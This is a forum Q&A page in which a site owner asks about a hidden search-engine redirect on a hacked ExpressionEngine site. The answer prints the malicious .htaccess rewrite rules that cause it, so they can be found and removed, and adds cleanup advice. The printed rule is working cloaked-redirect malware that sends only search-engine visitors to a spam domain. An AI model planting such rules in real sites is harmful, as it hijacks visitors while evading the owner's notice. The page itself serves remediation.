Home/ Questions/Q 6838081
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-26T23:33:13+00:00

I have an Expression Engine website of I try to clean up. The database

  • 0

I have an Expression Engine website of I try to clean up. The database has been given many new users so it seems the database has been hacked / links added. One mayor issue is that the site when clicked in Google is being bypassed. All visitors are being redirected to another website. Here is the search : http://tinyurl.com/72nzutj . First site is the one in question.. The site they are redirected to is http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555
I have been trying to find this redirect in all files and the database, but I have had no luck. It is not a .htaccess redirect, that I have checked and confirmed. But I have not been able to locate a JScript or PHP redirect in the files nor database as of yet.. Probably well hidden because of a base64 or packed encryption. Ideas?

NB no clean database version available

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    The redirects are happening from a compromise to your site’s .htaccess file, and are only affecting clickthrus from popular search engines. Accessing the site directly has no effect, and helps keep the malware from being detected.

    Look for the following code in your site’s directory and remove it:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
    RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>

    You may need to view “hidden files” in your FTP client or use ls -al from the command line to view your .htaccess file.

    After you’ve got the problem fixed, you’ll want to make sure you’re running the most recent version of ExpressionEngine (EE 1.7.1 or EE 2.3.1 as of this writing), as well as any third-party Add-Ons.

    Auditing your server’s access_logs may help identify the vulnerability that led to the compromise, and looking at the modification timestamp on the files in your website directory.

    A variant of this attack has already affected many WordPress installations, whereby a tiny base64_encoded JavaScript snippet was added just before the closing </body> tag, which lead to visitors being served a malware-infected Adobe Flash Player download.

    • 0